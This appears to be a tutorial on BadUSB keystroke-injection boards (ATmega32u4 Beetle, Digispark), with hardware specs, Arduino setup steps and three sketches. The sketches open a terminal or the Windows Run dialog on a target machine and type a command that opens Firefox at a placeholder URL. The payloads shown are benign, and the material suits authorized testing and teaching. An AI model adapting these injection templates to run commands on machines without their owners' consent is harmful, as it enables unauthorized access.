Using these devices we can inject keystrokes. A device which looks like an innocent flash drive to humans — abuses this trust to deliver powerful payloads, injecting keystrokes at superhuman speeds.
ATMEGA32U4
The equipment we provided for the use of the test, not for illegal purposes, or peril.
Microcontroller: ATmega32u4
Clock Speed: 16 MHz
Operating Voltage: 5V DC
Digital I/O Pins: 10
PWM Channels: 4
Analog Input Channels: 5
UART: 1
I2C: 1
Micro USB: 1
Flash Memory: 32 KB of which 4KB used by bootloader
SRAM: 2.5 KB
EEPROM: 1 KB
Package Included:
1 * BadUsb Beetle USB ATMEGA32U4 Development Board Module
HiLetgo BadUsb Beetle Bad USB Microcontroller ATMEGA32U4 Development Board Virtual Keyboard for Arduino Leonardo R3 DC 5V 16MHz
Attiny85 digispark
Install Arduino IDE
Run the following command to add your user to the dialout group:
sudo usermod -aG dialout $USER
Download and install board specifications
ATMEGA32U4: Arduino Leonardo
Script to open a page (Ubuntu):
#include <Keyboard.h>
void setup() {
// Begin the keyboard
Keyboard.begin();
// This delay gives you time to switch focus to the target machine
delay(5000);
// Open Terminal using the shortcut Ctrl+Alt+T
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('t');
delay(100); // Wait for key press to register
Keyboard.releaseAll();
delay(1000); // Wait for the terminal to open
// Type the command to open Firefox
Keyboard.print("firefox xxxx.pt");
Keyboard.press(KEY_RETURN);
delay(100); // Wait for key press to register
Keyboard.releaseAll();
}
void loop() {
// The loop function is empty since the task is completed in setup()
}
Windows:
#include <Keyboard.h>
void typeCharacter(char c) {
switch (c) {
case '/':
Keyboard.press(KEY_LEFT_SHIFT); // Pressiona SHIFT
Keyboard.press('7'); // Pressiona 7 para obter "/"
delay(100);
Keyboard.releaseAll();
break;
case ':':
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press('.');
delay(100);
Keyboard.releaseAll();
break;
case '.':
Keyboard.write('.');
break;
case ' ':
Keyboard.write(' ');
break;
default:
Keyboard.write(c);
break;
}
}
void setup() {
Keyboard.begin();
// Atraso para garantir que o sistema esteja pronto
delay(2000);
Keyboard.press(KEY_LEFT_GUI); // Tecla Win
delay(100);
Keyboard.press('r');
delay(100);
Keyboard.releaseAll();
delay(1500);
const char command[] = "firefox https://xxxx.com/aaaa.php";
for (int i = 0; i < sizeof(command) - 1; i++) {
typeCharacter(command[i]);
}
// Atraso antes de pressionar Enter
delay(1000);
Keyboard.press(KEY_RETURN);
delay(100);
Keyboard.releaseAll();
Keyboard.end();
}
void loop() {
}
#include "DigiKeyboard.h"
void setup() {
// This delay gives you time to switch focus to the target machine
DigiKeyboard.delay(5000);
// Open Terminal using the shortcut Ctrl+Alt+T
DigiKeyboard.sendKeyStroke(KEY_T, MOD_CONTROL_LEFT | MOD_ALT_LEFT);
DigiKeyboard.delay(1000);
// Type the command to open Firefox
// The 'firefox &' command should be the same, but you might need to adjust based on the keyboard layout
DigiKeyboard.print("firefox xxxxx.pt");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {
// The loop function is empty since the task is completed in setup()
}
Troubleshooting
Check Serial Port Permissions (Linux)
Open a terminal.
Check the permissions of the serial port:
ls -l /dev/ttyACM0
Ensure the output shows that the dialout group has read and write permissions:
crw-rw---- 1 root dialout 166, 0 Jun 15 12:00 /dev/ttyACM0
Udev Rules (Linux)
If you still encounter issues, you may need to add a udev rule to set the correct permissions automatically.
